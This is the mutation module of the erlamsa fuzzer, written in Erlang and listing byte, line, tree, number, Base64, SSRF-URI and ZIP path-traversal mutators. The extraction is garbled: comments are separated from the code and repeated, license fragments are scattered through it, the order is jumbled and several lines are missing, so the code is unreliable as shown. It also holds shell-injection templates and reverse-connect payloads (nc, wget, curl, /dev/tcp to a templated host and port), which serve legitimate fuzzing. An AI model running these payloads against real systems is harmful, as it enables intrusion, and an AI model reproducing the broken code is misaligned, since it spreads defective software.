swap two elements
erlamsa_generic:list_repeat(Lst, length(Lst));
swap two elements
erlamsa_generic:list_clone(Lst, length(Lst));
swap two elements
erlamsa_generic:list_swap(Lst, length(Lst));
basic_mutate_list([], _) -> [];
basic_mutate_list(Lst, _) -> %% mutate an element
R = erlamsa_rnd:erand(length(Lst)),
erlamsa_utils:applynth(R, Lst, fun basic_type_mutation/1).
-spec basic_mutate_string(list()) -> list().
basic_mutate_string(Str) ->
L = length(Str),
Asciis = lists:foldl(fun (A, Acc) when A>31,A<127 -> Acc+1; (_,Acc) -> Acc end, 0, Str),
if
Asciis / L >= 0.8 -> binary_to_list(basic_mutate_binary(list_to_binary(Str)));
true -> basic_mutate_list(Str)
end.
-spec basic_type_mutation(any(), float()) -> any().
basic_type_mutation(El, Prob) -> basic_type_mutation(El, erlamsa_rnd:rand_float(), Prob).
-spec basic_type_mutation(any(), float(), float()) -> any().
basic_type_mutation(El, Rnd, Prob) when Rnd >= Prob -> El;
basic_type_mutation(El, _Rnd, _Prob) -> basic_type_mutation(El).
-spec basic_type_mutation(any()) -> any().
%% mutate boolean -- just NOT
basic_type_mutation(true) -> false;
basic_type_mutation(false) -> true;
%% mutate a list
basic_type_mutation(El = [H|_]) when is_list(El), is_integer(H) =/= true -> basic_mutate_list(El);
%% mutate a string or list of integers
basic_type_mutation(El) when is_list(El) -> basic_mutate_string(El);
%% mutate a binary
basic_type_mutation(El) when is_binary(El) -> basic_mutate_binary(El);
%% mutate an integer
basic_type_mutation(El) when is_integer(El) -> mutate_num(El);
%% mutate a float
basic_type_mutation(El) when is_float(El) -> mutate_float(El);
basic_type_mutation(El) -> El.
%%
%% Main Mutation Functions
%%
-spec adjust_priority(non_neg_integer(), non_neg_integer()) -> non_neg_integer().
%% limit to [min-score .. max-score]
adjust_priority(Pri, 0) -> Pri;
adjust_priority(Pri, Delta) ->
max(?MIN_SCORE, min(?MAX_SCORE, Pri + Delta)).
-spec weighted_permutations([mutation()]) -> [mutation()].
%% [{Score, Priority, _, _}, ...] -> [{Rand(S*P), {...}}, ...] -> sort -> [{...}, ...]
weighted_permutations([]) -> [];
weighted_permutations(Pris) ->
PPris = lists:map(fun (X = {S, P, _, _}) -> {erlamsa_rnd:rand(trunc(S*P)), X} end, Pris),
SPPris = lists:sort(fun ({A,_},{B,_}) -> A>=B end, PPris),
[ X || {_, X} <- SPPris].
Mutators have a score they can change themselves ( 1 - 100 ) and a priority given by
%% the user at command line. Activation probability is (score*priority)/SUM(total-scores).
%%TODO: decribe fun() type
-spec mux_fuzzers([mutation()]) -> fun().
( # ( score priority name ) ... ) - > merged - mutafn : : rs ll meta - > merged - mutafn ' rs ' ll ' meta '
mux_fuzzers(Fs) ->
fun
L([<<>>], Meta) -> {mux_fuzzers(Fs), [<<>>], Meta}; %% TODO: if some mutation goes wrong, these could be infinite loop; redesign in future
L([], Meta) -> {mux_fuzzers(Fs), <<>>, Meta};
L(Ll, Meta) when is_list(Ll) ->
mux_fuzzers_loop(Ll, weighted_permutations(Fs), [], Meta);
L(Ll, Meta) when is_function(Ll) -> L(Ll(), Meta) %% TODO: strange behaviour
end.
-spec mux_fuzzers_loop(lazy_list_of_bins(), [mutation()], [mutation()], meta_list()) -> {fun(), lazy_list_of_bins(), meta_list()}.
mux_fuzzers_loop(Ll, [], Out, Meta) -> {mux_fuzzers(Out), Ll, Meta};
mux_fuzzers_loop(Ll = [H|_T], [_Node|Tail], Out, Meta) when is_binary(H), byte_size(H) > ?ABSMAX_BINARY_BLOCK ->
{mux_fuzzers(Out ++ Tail), Ll, [{skipped_big, byte_size(H)} | Meta]};
mux_fuzzers_loop(Ll, [Node|Tail], Out, Meta) ->
{Mscore, MPri, Fn, Mname} = Node,
Res = Fn(Ll, Meta),
in radamsa ( mfn rs mll mmeta delta ) = Fn ( ... ) , that strange , TODO : check it
in radamsa mfn instead of fn
IsMll = is_list(Mll),
if
IsMll andalso (hd(Mll) == hd(Ll)) -> mux_fuzzers_loop(Ll, Tail, NOut, [{failed, Mname} | MMeta]);
true -> {mux_fuzzers(NOut ++ Tail), Mll, [{used, Mname} | MMeta]}
end.
-spec mutations() -> [mutation()].
%% default mutations list
mutations() ->
mutations([]).
-spec mutations([mutation()]) -> [mutation()].
%% default mutations list + external mutas
mutations(CustomMutas) ->
[{?MAX_SCORE, 10, fun erlamsa_sgml:sgml_mutate/2, sgm, "SGML tree mutations"},
{?MAX_SCORE, 3, fun erlamsa_json:json_mutate/2, js, "JSON tree mutations"},
{?MAX_SCORE, 1, fun sed_utf8_widen/2, uw, "try to make a code point too wide"},
{?MAX_SCORE, 2, fun sed_utf8_insert/2, ui, "insert funny unicode"},
{?MAX_SCORE, 1, construct_ascii_bad_mutator(), ab, "enhance silly issues in ASCII string data handling"},
{?MAX_SCORE, 1, construct_ascii_delimeter_mutator(), ad, "play with delimeters in ASCII string data"},
{?MAX_SCORE, 1, sed_tree_dup(), tr2, "duplicate a node"},
{?MAX_SCORE, 1, sed_tree_del(), td, "delete a node"},
{?MAX_SCORE, 3, fun sed_num/2, num, "try to modify a textual number"},
{?MAX_SCORE, 2, construct_sed_tree_swap(fun sed_tree_swap_one/2, tree_swap_one), ts1, "swap one node with another one"},
{?MAX_SCORE, 2, fun sed_tree_stutter/2, tr, "repeat a path of the parse tree"},
{?MAX_SCORE, 2, construct_sed_tree_swap(fun sed_tree_swap_two/2, tree_swap_two), ts2, "swap two nodes pairwise"},
{?MAX_SCORE, 1, construct_sed_byte_drop(), bd, "drop a byte"},
{?MAX_SCORE, 1, construct_sed_byte_inc(), bei, "increment a byte by one"},
{?MAX_SCORE, 1, construct_sed_byte_dec(), bed, "decrement a byte by one"},
{?MAX_SCORE, 1, construct_sed_byte_flip(), bf, "flip one bit"},
{?MAX_SCORE, 1, construct_sed_byte_insert(), bi, "insert a byte"},
{?MAX_SCORE, 1, construct_sed_byte_random(), ber, "swap a byte with random one"},
{?MAX_SCORE, 1, construct_sed_byte_repeat(), br, "repeat a byte"},
{?MAX_SCORE, 1, construct_sed_bytes_perm(), sp, "permute a sequence of bytes"},
{?MAX_SCORE, 1, construct_sed_bytes_repeat(), sr, "repeat a sequence of bytes"},
{?MAX_SCORE, 1, construct_sed_bytes_drop(), sd, "delete a sequence of bytes"},
{?MAX_SCORE, 1, construct_sed_bytes_randmask([fun mask_nand/1, fun mask_or/1, fun mask_xor/1]), snand, "NAND/OR/XOR random bytes from block with 2^random values"},
{?MAX_SCORE, 1, construct_sed_bytes_randmask([fun mask_replace/1]), srnd, "replace random bytes from block with random values"},
{?MAX_SCORE, 1, construct_line_muta(fun erlamsa_generic:list_del/2, line_del), ld, "delete a line"},
{?MAX_SCORE, 1, construct_line_muta(fun erlamsa_generic:list_del_seq/2, line_del_seq), lds, "delete many lines"},
{?MAX_SCORE, 1, construct_line_muta(fun erlamsa_generic:list_dup/2, line_dup), lr2, "duplicate a line"},
{?MAX_SCORE, 1, construct_line_muta(fun erlamsa_generic:list_clone/2, line_clone), lri, "copy a line closeby"},
{?MAX_SCORE, 1, construct_line_muta(fun erlamsa_generic:list_repeat/2, line_repeat), lr, "repeat a line"},
{?MAX_SCORE, 1, construct_line_muta(fun erlamsa_generic:list_swap/2, line_swap), ls, "swap two lines"},
{?MAX_SCORE, 1, construct_line_muta(fun erlamsa_generic:list_perm/2, line_perm), lp, "swap order of lines"},
{?MAX_SCORE, 1, construct_st_line_muta(fun erlamsa_generic:st_list_ins/2, list_ins, [0]), lis, "insert a line from elsewhere"},
{?MAX_SCORE, 1, construct_st_line_muta(fun erlamsa_generic:st_list_replace/2, list_replace, [0]), lrs, "replace a line with one from elsewhere"},
{?MAX_SCORE, 2, fun sed_fuse_this/2, ft, "jump to a similar position in block"},
{?MAX_SCORE, 1, fun sed_fuse_next/2, fn, "likely clone data between similar positions"},
{?MAX_SCORE, 2, fun sed_fuse_old/2, fo, "fuse previously seen data elsewhere"},
{?MAX_SCORE, 2, fun length_predict/2, len, "predicted length mutation"},
{?MAX_SCORE, 7, fun base64_mutator/2, b64, "try mutate base64-encoded block"},
{?MAX_SCORE, 1, fun uri_mutator/2, uri, "try mutate URI to cause SSRF"},
{?MAX_SCORE, 1, fun zip_path_traversal/2, zip, "ZIP path traversal"},
{?MAX_SCORE, 0, fun nomutation/2, nil, "no mutation will occur (debugging purposes)"}
|CustomMutas].
%% convert mutas list to standalone format
{ Max_Score , Pri , F , Name , Desc } - > { Score , , F , Name }
-spec mutas_list(list()) -> [mutation()].
mutas_list(Lst) ->
lists:map(fun({Score, Pri, F, Name, _Desc}) -> {Score, Pri, F, Name} end, Lst).
%% JSON/XML inner mutations
-spec inner_mutations_list(atom()) -> [atom()].
inner_mutations_list(sgml) -> [ab, ad, bd, b64, ld, lp, lri, lr, num, sd, uri, json];
inner_mutations_list(json) -> [ab, ad, b64, num, sd, sp, sr, uri, sgm];
inner_mutations_list(_) -> [ab, ad, ber, b64, ld, lp, lri, lr, num, sd, srnd, sxor, uri, zip].
-spec inner_mutations(atom()) -> [mutation()].
inner_mutations(Case) ->
InnerMutationsMap = maps:from_list(lists:map(fun (A) -> {A, ok} end, inner_mutations_list(Case))),
lists:foldl(
fun({Sc, Pri, Fun, Name, _Desc}, Acc) ->
case maps:get(Name, InnerMutationsMap, no) of
ok -> [{Sc, Pri, Fun, Name}|Acc];
no -> Acc
end
end,
[], mutations([])).
-spec default(list()) -> [{atom(), non_neg_integer()}].
default(CustomMutas) -> [{Name, Pri} || {_, Pri, _, Name, _Desc} <- mutations(CustomMutas)].
-spec tostring(list()) -> string().
tostring(Lst) ->
lists:foldl(fun ({_, Pri, _, Name, _Desc}, Acc) ->
case Pri of
1 -> atom_to_list(Name) ++ "," ++ Acc;
_Else -> atom_to_list(Name) ++ "=" ++ integer_to_list(Pri) ++ "," ++ Acc
end
end, [], Lst).
-spec make_mutator([{atom(), non_neg_integer()}], list()) -> fun().
make_mutator(Lst, CustomMutas) ->
SelectedMutas = maps:from_list(Lst),
Mutas = lists:foldl(
fun ({Score, _Pri, F, Name, _Desc}, Acc) ->
Val = maps:get(Name, SelectedMutas, notfound),
case Val of
notfound -> Acc;
_Else -> [{Score, Val, F, Name} | Acc]
end
end,
[],
mutations(CustomMutas)),
mutators_mutator(Mutas).
-spec mutators_mutator([mutation()]) -> fun().
%% randomize mutator scores
mutators_mutator(Mutas) ->
mutators_mutator(Mutas, []).
-spec mutators_mutator([mutation()], [mutation()]) -> fun().
mutators_mutator([], Out) ->
mux_fuzzers(Out);
mutators_mutator([{_, Pri, F, Name}|T], Out) ->
N = erlamsa_rnd:rand(trunc(?MAX_SCORE)),
mutators_mutator(T, [{max(2, N), Pri, F, Name} | Out]).
| null | https://raw.githubusercontent.com/Darkkey/erlamsa/16c74f32743a3153e330a62945f9880e53549ab1/src/erlamsa_mutations.erl | erlang |
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR
THE USE OR OTHER DEALINGS IN THE SOFTWARE.
-------------------------------------------------------------------
@author dark_k3y
@doc
Mutations definitions.
@end
-------------------------------------------------------------------
API
return maximum possible score value
clone a byte vector and edit at given position
Number Mutator
TODO: verify that this is useful
low priority negative, because could be textual with less frequent numbers
drop byte
repeat a byte
flip a bit in a byte
insert a byte
-spec construct_sed_bytes_muta(byte_edit_fun(), atom()) -> mutation_fun().
should use something like repeat-len
permute a few bytes
repeat a seq
drop a seq
randomly applies maskfunction byte-per-byte to list with pre-randomized prob.
permute a few bytes
Lines
Lst -> bvec
TODO: ugly code, need a bit refactor
calc length only once
state is (n <line> ...)
Shared sequences
(a b ...) -> (a+a b ...)
next or current
a -> o
o -> a
Text mutations
check that the nodes do look stringy enough to mutate with these
heuristics, meaning there are some nodes and/or just one, but it's
stringy
insert badness
empty list -- just insert random
replace badness
empty list -- just replace with random
insert as
empty list -- just insert random
insert path traversal
empty list -- just insert random
insert null
empty list -- just insert random
TODO: check before or after E
empty list -- just insert random
Else, if Cs contains only byte nodes, it will run infinetely
Here, we do maximum L/4 runs in this case
TODO: WARN: Ineffective, need rewrite/optimize
[Node]
do something bad...
drop right
drop left
drop both
drop none
Play with delimeters
insert or drop special delimeter(s)
[Node]
do nothing
Base64 Mutator
io:format("~p ~n", [Cs]),
io:format("~p~n", [Ms]),
URI SSRF/Path traversal Mutator
need this wrapper in case if ets process not started (erlamsa_app:start haven't called)
replace file with http
Guessed Parse-tree Mutations
?? could be settable from command line
()
[]
<>
{}
""
''
out of data, didn't find close. return partial parse.
match complete, return with rest of list
we didn't run out of data and this is a single tree node
we ran out of data. this is a list of partial parses (having the data of
lst after hd in some form) which we want to preserve as tail
-spec count_nodes(list()) -> non_neg_integer().
%% count how many list nodes are in a tree structure
count_nodes(Lst) -> count_nodes(Lst, 0).
-spec count_nodes(list(), non_neg_integer()) -> non_neg_integer().
count_nodes([], N) -> N;
count_nodes([H|T], N) when is_list(H) ->
count_nodes([_|T], N) ->
count_nodes(T, N).
TODO: type for fun().
replace the node (sub . tail) with (op (sub . tail))
TODO: type for fun().
-spec flatten(list(), list()) -> list().
flatten([], Tl) ->
Tl;
flatten([H|T], Tl) ->
flatten(H, flatten(T, Tl));
flatten(Node, Tl) ->
[Node | Tl].
TODO: type for fun().
choose partially parsed node to mutate ;; fixme: not checked for F
TODO: type for fun().
tree stutter
preventing too deep lists
no child nodes
(byte|node ...)
TODO: VERY INEFFECTIVE, should be constant...
the canonical utf8 bom
utf16 be bom
ascii null be
ascii null le
and some others from wikipedia
Null debug mutator -- passes data "as is" -- for testing
Length predict mutations -- trying to mutate len
TODO: correct spec
-spec mutate_length(binary()) -> {integer(), binary()}.
set len field = 0
expand blob field with random data
drop blob field
set len field = random bytes(..)
ZIP Path traversal
replace with empty
dup a list
permute a list
delete an element
delete an element
mutate an element
mutate boolean -- just NOT
mutate a list
mutate a string or list of integers
mutate a binary
mutate an integer
mutate a float
Main Mutation Functions
limit to [min-score .. max-score]
[{Score, Priority, _, _}, ...] -> [{Rand(S*P), {...}}, ...] -> sort -> [{...}, ...]
the user at command line. Activation probability is (score*priority)/SUM(total-scores).
TODO: decribe fun() type
TODO: if some mutation goes wrong, these could be infinite loop; redesign in future
TODO: strange behaviour
default mutations list
default mutations list + external mutas
convert mutas list to standalone format
JSON/XML inner mutations
randomize mutator scores
| Copyright ( c ) 2011 - 2014
Copyright ( c ) 2014 - 2019
in the Software without restriction , including without limitation the rights
copies of the Software , and to permit persons to whom the Software is
all copies or substantial portions of the Software .
THE SOFTWARE IS PROVIDED " AS IS " , WITHOUT WARRANTY OF ANY KIND , EXPRESS OR
DAMAGES OR OTHER LIABILITY , WHETHER IN AN ACTION OF CONTRACT , TORT OR
-module(erlamsa_mutations).
-author("dark_k3y").
-ifdef(TEST).
-include_lib("eunit/include/eunit.hrl").
-compile([export_all]).
-endif.
-include("erlamsa.hrl").
-export([make_mutator/2, mutators_mutator/1, mutations/0, mutations/1, default/1, tostring/1,
get_max_score/0, inner_mutations/1, get_ssrf_uri/0, basic_type_mutation/2]).
-define(MIN_SCORE, 2.0).
-define(MAX_SCORE, 10.0).
-define(RAND_DELTA, 18446744073709551616).
-type byte_edit_fun() :: fun((byte()) -> binary()).
-type text_mutators() :: insert_badness | replace_badness | insert_aaas | insert_null | insert_delimeter.
-spec get_max_score() -> float().
get_max_score() ->
?MAX_SCORE.
-spec edit_byte_vector(binary(), non_neg_integer(), byte_edit_fun()) -> binary().
edit_byte_vector(BVec = <<>>, _, _) -> BVec;
edit_byte_vector(BVec, Edit_pos, Func) ->
Head_cnt = Edit_pos*8,
<<H:Head_cnt, B:8, T/binary>> = BVec,
C = Func(B),
<<H:Head_cnt, C/binary, T/binary>>.
-spec interesting_numbers() -> list(integer()).
interesting_numbers() ->
lists:foldl(
fun (I, Acc) ->
X = 1 bsl I,
[X-1, X, X+1 | Acc]
end,
[],
[1, 7, 8, 15, 16, 31, 32, 63, 64, 127, 128]).
-spec sign(integer()) -> integer().
sign(X) when X >= 0 -> 1;
sign(_) -> -1.
-spec mutate_float(float()) -> float().
mutate_float(Num) -> mutate_float(Num, erlamsa_rnd:rand(7)).
-spec mutate_float(float(), 0..7) -> float().
mutate_float(Num, 0) -> -Num;
mutate_float(_, 1) -> 0.0;
mutate_float(_, 2) -> 1.0;
mutate_float(_, 3) -> 1.0e-323;
mutate_float(_, 4) -> 1.0e308;
mutate_float(_, _) -> erlamsa_rnd:rand_float() * math:exp(100*erlamsa_rnd:rand_float()).
-spec mutate_num(integer()) -> integer().
mutate_num(Num) -> mutate_num(Num, erlamsa_rnd:rand(12)).
-spec mutate_num(integer(), 0..12) -> integer().
mutate_num(Num, 0) -> Num + 1;
mutate_num(Num, 1) -> Num - 1;
mutate_num(_, 2) -> 0;
mutate_num(_, 3) -> 1;
mutate_num(_, N) when N > 3 andalso N < 6 -> erlamsa_rnd:rand_elem(interesting_numbers());
mutate_num(Num, 7) -> Num + erlamsa_rnd:rand_elem(interesting_numbers());
mutate_num(Num, 8) -> Num - erlamsa_rnd:rand_elem(interesting_numbers());
mutate_num(Num, 9) -> Num - erlamsa_rnd:rand(erlang:abs(Num)*2) * sign(Num);
mutate_num(Num, _) ->
N = erlamsa_rnd:rand_range(1, 129),
L = erlamsa_rnd:rand_log(N),
S = erlamsa_rnd:rand(3),
case S of
0 -> Num - L;
_Else -> Num + L
end.
-spec get_num(binary()) -> {integer() | false, binary()}.
get_num(Bin) -> get_num(Bin, 0, 0, 1).
-spec get_num(binary(), integer(), non_neg_integer(), 1 | -1) -> {integer() | false, binary()}.
get_num(<<>>, _, 0, _) -> {false, <<>>};
get_num(<<>>, N, _, Sign) -> {N * Sign, <<>>};
get_num(<<D:8,T/binary>>, N, Digits, Sign) when (D >= 48) and (D =< 57) ->
get_num(T, D - 48 + N*10, Digits + 1, Sign);
get_num(<<D:8,T/binary>>, N, Digits, _) when (D =:= 45) and (Digits =:= 0) ->
get_num(T, N, Digits, -1);
get_num(Lst, _, 0, _) -> {false, Lst};
get_num(Lst, N, _, Sign) -> {N * Sign, Lst}.
-spec copy_range(binary(), binary(), binary()) -> binary().
copy_range(Pos, Pos, Tail) -> Tail;
copy_range(<<H:8,T/binary>>, End, Tail) -> NT = copy_range(T, End, Tail), <<H:8, NT/binary>>.
-spec mutate_a_num(binary(), integer()) -> {integer(), binary()}.
mutate_a_num(<<>>, NFound) ->
Which = erlamsa_rnd:rand(NFound),
{Which, <<>>};
mutate_a_num(Lst = <<H:8, T/binary>>, NFound) ->
{ValP, LstP} = get_num(Lst),
if
ValP =/= false ->
{Which, Tail} = mutate_a_num(LstP, NFound + 1),
case Which of
0 ->
NewNum = mutate_num(ValP),
BinNewNum = list_to_bitstring(integer_to_list(NewNum)),
{-1, erlamsa_utils:merge(BinNewNum, Tail)};
_Else ->
{Which - 1, copy_range(Lst, LstP, Tail)}
end;
true ->
{Which, Tail} = mutate_a_num(T, NFound),
{Which, <<H:8, Tail/binary>>}
end.
-spec sed_num(list_of_bins(), meta_list()) -> mutation_res().
sed_num([H|T], Meta) ->
{N, Lst} = mutate_a_num(H, 0),
IsBin = erlamsa_utils:binarish(Lst),
FlushedLst = erlamsa_utils:flush_bvecs(Lst, T),
if
N =:= 0 ->
case R of
0 -> {fun sed_num/2, FlushedLst, [{muta_num, 0}|Meta], -1};
_Else -> {fun sed_num/2, FlushedLst, [{muta_num, 0}|Meta], 0}
end;
IsBin =:= true ->
{fun sed_num/2, FlushedLst, [{muta_num, 1}|Meta], -1};
true ->
{fun sed_num/2, FlushedLst, [{muta_num, 1}|Meta], +2}
end.
Single Byte - level Mutations
-spec construct_sed_byte_muta(byte_edit_fun(), atom()) -> mutation_fun().
construct_sed_byte_muta(F, Name) ->
fun Self([H|T], Meta) ->
P = erlamsa_rnd:rand(byte_size(H)),
D = erlamsa_rnd:rand_delta(),
{Self, [edit_byte_vector(H, P, F) | T], [{Name, D}|Meta], D}
end.
-spec construct_sed_byte_drop() -> mutation_fun().
construct_sed_byte_muta(fun (B) -> <<B:0>> end, byte_drop).
-spec construct_sed_byte_inc() -> mutation_fun().
inc byte mod 256
construct_sed_byte_muta(fun (B) -> C = (B + 1) band 255, <<C:8>> end, byte_inc).
-spec construct_sed_byte_dec() -> mutation_fun().
dec byte mod 256
construct_sed_byte_muta(fun (B) -> C = (B - 1) band 255, <<C:8>> end, byte_dec).
-spec construct_sed_byte_repeat() -> mutation_fun().
construct_sed_byte_muta(fun (B) -> <<B:8, B:8>> end, byte_repeat).
-spec construct_sed_byte_flip() -> mutation_fun().
construct_sed_byte_muta(
fun (B) ->
Flip = erlamsa_rnd:rand(8),
Mask = 1 bsl Flip,
C = B bxor Mask,
<<C:8>>
end, byte_flip).
-spec construct_sed_byte_insert() -> mutation_fun().
construct_sed_byte_muta(
fun (B) ->
NewByte = erlamsa_rnd:rand(256),
<<NewByte:8, B:8>>
end, byte_insert).
-spec construct_sed_byte_random() -> mutation_fun().
swap a byte with a random one
construct_sed_byte_muta(
fun (_B) ->
NewByte = erlamsa_rnd:rand(256),
<<NewByte:8>>
end, byte_swap_random).
Multiple Byte - level Mutations
Warning : this implememntations are not radamsa - like , only making " similar " things , but in the other way and with slight differences
-spec construct_sed_bytes_muta(fun(), atom()) -> mutation_fun().
construct_sed_bytes_muta(F, Name) ->
fun
Self([<<>>|BTail], Meta) ->
{Self, [<<>>|BTail], [{Name, -1}|Meta], -1};
Self([BVec|BTail], Meta) ->
BSize = byte_size(BVec),
S = erlamsa_rnd:rand(BSize),
L = erlamsa_rnd:rand_range(1, BSize - S + 1),
WARN : ^ here any ( min 2 ) , in radamsa 20 : magic constant ,
^^ check may be max(20 , ... ) with " MAGIX " could be MORE effective
H_bits = S*8,
P_bits = L*8,
<<H:H_bits, P:P_bits, T/binary>> = BVec,
C = F(<<H:H_bits>>, <<P:P_bits>>, T, BTail),
D = erlamsa_rnd:rand_delta(),
{Self, C, [{Name, BSize}|Meta], D}
end.
-spec construct_sed_bytes_perm() -> mutation_fun().
WARN : in radamsa max permutation block could not exceed length 20 , here could be any length
construct_sed_bytes_muta(
fun (H, Bs, T, BTail) ->
C = list_to_binary(
erlamsa_rnd:random_permutation(
binary_to_list(Bs))),
[<<H/binary, C/binary, T/binary>> | BTail]
end, seq_perm).
-spec construct_sed_bytes_repeat() -> mutation_fun().
construct_sed_bytes_muta(
fun (H, Bs, T, BTail) ->
max 2 ^ 10 = 1024 stuts
C = list_to_binary([Bs || _ <- lists:seq(1,N)]),
Res = [<<H/binary, C/binary ,T/binary>> | BTail],
Res
end, seq_repeat).
-spec construct_sed_bytes_drop() -> mutation_fun().
construct_sed_bytes_muta(
fun (H, _Bs, T, BTail) ->
[<<H/binary, T/binary>> | BTail] end, seq_drop).
-spec randmask(fun(), list()) -> list().
randmask(MaskFun, Ll) ->
MaskProb = erlamsa_rnd:erand(100),
randmask_loop(MaskFun, MaskProb, erlamsa_rnd:rand_occurs_fixed(MaskProb, 100), Ll, []).
-spec randmask_loop(fun(), non_neg_integer(), non_neg_integer(), list(), list()) -> list().
randmask_loop(_MaskFun, _MaskProb, _, [], Out) ->
lists:reverse(Out);
randmask_loop(MaskFun, MaskProb, true, [H | T], Out) ->
randmask_loop(MaskFun, MaskProb, erlamsa_rnd:rand_occurs_fixed(MaskProb, 100), T, [MaskFun(H) | Out]);
randmask_loop(MaskFun, MaskProb, false, [H | T], Out) ->
randmask_loop(MaskFun, MaskProb, erlamsa_rnd:rand_occurs_fixed(MaskProb, 100), T, [H | Out]).
-spec mask_nand(byte()) -> byte().
mask_nand(B) ->
B band (bnot (1 bsl erlamsa_rnd:rand(8))).
-spec mask_or(byte()) -> byte().
mask_or(B) ->
B bor (1 bsl erlamsa_rnd:rand(8)).
-spec mask_xor(byte()) -> byte().
mask_xor(B) ->
B bxor (1 bsl erlamsa_rnd:rand(8)).
-spec mask_replace(byte()) -> byte().
mask_replace(_) ->
erlamsa_rnd:rand(256).
-spec construct_sed_bytes_randmask(list(fun())) -> mutation_fun().
WARNING : in radamsa max permutation block could not exceed length 20 , here could be any length
MaskFun = erlamsa_rnd:rand_elem(MaskFunList),
construct_sed_bytes_muta(
fun (H, Bs, T, BTail) ->
C = list_to_binary(
randmask(MaskFun, binary_to_list(Bs))),
[<<H/binary, C/binary, T/binary>> | BTail]
end, seq_randmask).
-spec lines(binary()) -> [string()].
bvec - > ( [ ... , 10 ] .. [ ... , 10 ] ) , cut after newlines
lines(Bvec) -> lines(binary_to_list(Bvec), [], []).
lines([], [], Out) -> lists:reverse(Out);
lines([], Buff, Out) -> lists:reverse([lists:reverse(Buff)] ++ Out);
lines([10|T], Buff, Out) -> lines(T, [], [lists:reverse([10 | Buff]) | Out]);
lines([H|T], Buff, Out) -> lines(T, [H | Buff], Out).
-spec unlines([string()]) -> binary().
unlines(Lst) ->
lists:foldl(fun (X, Acc) -> C = list_to_binary(X), <<Acc/binary, C/binary>> end, <<>>, Lst).
-spec try_lines(binary()) -> [string()] | false.
# u8[byte ... ] - > ( ( byte ... 10 ) ... ) | # false , if this does n't look like line - based text data
try_lines(Bvec) ->
Ls = lines(Bvec),
IsBin = erlamsa_utils:binarish(Bvec),
if
Ls =:= [] -> false;
IsBin =:= true -> false;
true -> Ls
end.
-spec construct_line_muta(fun(), atom()) -> mutation_fun().
construct_line_muta(Op, Name) ->
fun Self(Ll = [H|T], Meta) ->
Ls = try_lines(H),
if
Ls =:= false ->
{Self, Ll, Meta, -1};
true ->
NH = unlines(MLs),
{Self, [NH | T], [{Name, 1}|Meta], 1}
end
end.
-spec construct_st_line_muta(fun(), atom(), list()) -> mutation_fun().
construct_st_line_muta(Op, Name, InitialState) ->
fun (Ll = [H|T], Meta) ->
Ls = try_lines(H),
if
Ls =:= false ->
{construct_st_line_muta(Op, Name, InitialState),
Ll, Meta, -1};
true ->
{Stp, NewLs} = Op(InitialState, Ls),
{construct_st_line_muta(Op, Name, Stp),
[unlines(NewLs) | T], [{Name, 1} | Meta], 1}
end
end.
-spec sed_fuse_this(list_of_bins(), meta_list()) -> mutation_res().
jump between two shared suffixes in the block
Lst = binary_to_list(H),
B = list_to_binary(erlamsa_fuse:fuse(Lst, Lst)),
D = erlamsa_rnd:rand_delta(),
{fun sed_fuse_this/2, [B | T], [{fuse_this, D}|Meta], D}.
-spec sed_fuse_next(list_of_bins(), meta_list()) -> mutation_res().
sed_fuse_next([H|T], Meta) ->
{Al1, Al2} = erlamsa_utils:halve(binary_to_list(H)),
Bl = binary_to_list(B),
Abl = erlamsa_fuse:fuse(Al1, Bl),
Abal = erlamsa_fuse:fuse(Abl, Al2),
D = erlamsa_rnd:rand_delta(),
{fun sed_fuse_next/2,
< - on avg 1x , max 2x block sizes
[{fuse_next, D}|Meta], D}.
-spec remember(binary()) -> mutation_fun().
remember(Block) ->
fun ([H|T], Meta) ->
TODO : Check -- in radamsa here using owllisp halve instead of split
{Al1, Al2} = erlamsa_utils:halve(binary_to_list(H)),
{Ol1, Ol2} = erlamsa_utils:halve(binary_to_list(Block)),
Swap = erlamsa_rnd:rand(3),
D = erlamsa_rnd:rand_delta(),
NewBlock = case Swap of
0 -> H;
_Else -> Block
end,
{remember(NewBlock),
< - on avg 1x , max 2x block sizes
erlamsa_utils:flush_bvecs(list_to_binary(B), T)),
[{fuse_old, D}|Meta], D}
end.
-spec sed_fuse_old(list_of_bins(), meta_list()) -> mutation_res().
sed_fuse_old(Ll = [H|_], Meta) ->
R = remember(H),
R(Ll, Meta).
ASCII string mutations ( use UTF-8 later )
in radamsa this will stop if found byte node ; here , we continue
-spec stringy(list(byte())) -> false | true.
stringy([]) -> false;
stringy([{byte, _} | T]) -> false or stringy(T);
in radamsa -- length(Cs )
-spec silly_strings() -> list(string()).
added \r
["%n", "%n", "%s", "%d", "%p", "%#x", [0], "aaaa%d%n", [10], [13], [9], [8]].
-spec delimeters() -> list(string()).
delimeters() ->
["'", "\"", "'", "\"", "'", "\"", "&", ":", "|", ";",
"\\", [10], [13], [9], " ", "`", [0], "]", "[", ">", "<"].
-spec shellinjects() -> list(string()).
shellinjects() ->
[
"';~s;'", "\";~s;\"", ";~s;", "|~s#",
"^ ~s ^", "& ~s &", "&& ~s &&", "|| ~s ||",
"%0D~s%0D", "`~s`"
].
-spec revconnects() -> list(string()).
revconnects() ->
[
"calc.exe & notepad.exe ~s ~p ", "nc ~s ~p", "wget http://~s:~p", "curl ~s ~p",
"exec 3<>/dev/tcp/~s/~p", "sleep 100000 # ~s ~p ", "echo>/tmp/erlamsa.~s.~p"
].
-spec random_badness() -> list().
random_badness() ->
random_badness(erlamsa_rnd:rand(20) + 1, []).
-spec random_badness(non_neg_integer(), list()) -> list().
random_badness(0, Out) -> Out;
random_badness(N, Out) ->
X = erlamsa_rnd:rand_elem(silly_strings()),
random_badness(N - 1, X ++ Out).
-spec overwrite(list(), list()) -> list().
overwrite([], Old) -> Old;
overwrite([H|T], [_|OldT]) ->
[H | overwrite(T, OldT)];
overwrite([H|T], Old) ->
[H | overwrite(T, Old)].
-spec rand_as_count() -> non_neg_integer().
rand_as_count() ->
Type = erlamsa_rnd:rand(11),
case Type of
0 -> 127;
1 -> 128;
2 -> 255;
3 -> 256;
4 -> 16383;
5 -> 16384;
6 -> 32767;
7 -> 32768;
